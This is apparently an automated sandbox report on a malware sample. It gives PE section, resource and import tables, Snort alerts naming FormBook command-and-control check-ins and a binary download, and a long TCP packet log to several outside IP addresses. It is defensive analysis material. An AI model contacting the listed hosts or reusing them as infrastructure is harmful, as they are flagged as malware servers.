[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8438	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4bd000	0xb48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6393	0x6400	False	0.6801171875	data	6.492606591005325	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1276	0x1400	False	0.43359375	data	5.057696881091476	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x3bc078	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3c7000	0xf6000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4bd000	0xb48	0xc00	False	0.423828125	data	4.377061098345556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x4bd1c0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States
RT_DIALOG	0x4bd4a8	0x100	data	English	United States
RT_DIALOG	0x4bd5a8	0x11c	data	English	United States
RT_DIALOG	0x4bd6c8	0xc4	data	English	United States
RT_DIALOG	0x4bd790	0x60	data	English	United States
RT_GROUP_ICON	0x4bd7f0	0x14	data	English	United States
RT_MANIFEST	0x4bd808	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, SetWindowPos, SetCursor, GetSysColor, SetClassLongA, GetWindowLongA, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersionExA, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.2034.138.169.849839802018752 03/27/23-13:05:11.349329	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49839	80	192.168.11.20	34.138.169.8
192.168.11.20198.54.117.21249844802031412 03/27/23-13:06:36.076588	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	198.54.117.212
192.168.11.2064.190.63.11149868802031449 03/27/23-13:12:26.472982	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49868	80	192.168.11.20	64.190.63.111
192.168.11.20198.54.117.21249844802031453 03/27/23-13:06:36.076588	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	198.54.117.212
192.168.11.2064.190.63.11149868802031453 03/27/23-13:12:26.472982	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49868	80	192.168.11.20	64.190.63.111
192.168.11.20198.54.117.21249844802031449 03/27/23-13:06:36.076588	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49844	80	192.168.11.20	198.54.117.212
192.168.11.2064.190.63.11149868802031412 03/27/23-13:12:26.472982	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49868	80	192.168.11.20	64.190.63.111

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2023 14:05:11.207170010 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.347896099 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.348459005 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.349328995 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.489993095 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490650892 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490709066 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490747929 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490786076 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490819931 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490852118 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490886927 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490921974 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490959883 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.490993977 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.491067886 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.491189957 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.491189957 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.631695986 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.631789923 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.631858110 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.631921053 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.631978035 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.631984949 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632047892 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632050037 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632114887 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632158995 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632179022 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632217884 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632242918 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632329941 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632339954 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632388115 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632416010 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632482052 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632498026 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632546902 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632556915 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632610083 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632674932 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632726908 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632739067 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632802963 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632867098 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632877111 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632877111 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632930040 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.632944107 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.632994890 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.633068085 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.633126974 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.633317947 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.773741007 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.773844004 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.773917913 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.773992062 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774020910 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774068117 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774091959 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774142027 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774214029 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774221897 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774287939 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774360895 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774419069 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774434090 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774483919 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774506092 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774616957 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774621964 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774621964 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774693966 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774698019 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774766922 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774837017 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774856091 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774907112 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.774919987 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.774979115 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775049925 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775062084 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775120020 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775125980 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775191069 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775190115 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775243044 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775263071 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775335073 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775376081 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775405884 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775477886 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775548935 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775547028 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775610924 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775620937 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775672913 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775693893 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775722980 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775765896 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775836945 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775851965 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775907993 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.775955915 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.775979996 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776051998 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776084900 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776084900 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776123047 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776161909 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776194096 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776266098 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776278973 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776343107 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776390076 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776467085 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776510954 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776537895 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776576042 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776608944 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776638985 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776679993 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.776861906 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.776861906 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917198896 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917292118 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917360067 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917424917 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917471886 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917471886 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917490005 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917556047 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917624950 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917690992 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917694092 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917694092 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917758942 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917826891 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917865992 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917865992 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.917891979 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.917963028 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918026924 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918045998 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918046951 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918091059 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918154955 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918219090 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918224096 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918224096 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918282986 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918346882 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918402910 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918402910 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918411016 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918478012 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918541908 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918582916 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918582916 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918605089 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918669939 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918734074 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918756008 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918756008 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918797970 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918863058 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918926954 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.918927908 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918927908 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.918992043 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919056892 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919120073 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919120073 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919178963 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919184923 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919249058 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919311047 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919326067 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919375896 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919420958 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919440985 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919487000 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919506073 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919569969 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919612885 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919634104 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919672012 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919698954 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919761896 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919815063 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919816017 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.919825077 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919889927 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.919951916 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920003891 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920005083 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920015097 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920079947 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920144081 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920186996 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920187950 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920207024 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920255899 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920272112 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920386076 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920403957 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920444965 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920478106 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920542002 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920604944 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920622110 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920665026 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920669079 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920733929 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920747042 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920790911 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.920798063 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920861006 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920923948 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920986891 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.920994043 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921037912 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921050072 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921113968 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921122074 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921176910 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921217918 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921240091 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921303034 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921303988 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921345949 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921369076 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921432972 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921448946 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921525955 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921545982 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921592951 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921607018 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921655893 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921709061 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921720982 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921785116 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921799898 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921864986 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921875954 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921894073 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921921015 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921948910 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921957016 CEST	49839	80	192.168.11.20	34.138.169.8
Mar 27, 2023 14:05:11.921969891 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.921989918 CEST	80	49839	34.138.169.8	192.168.11.20
Mar 27, 2023 14:05:11.922008991 CEST	80	49839	34.138.169.8	192.168.11.20
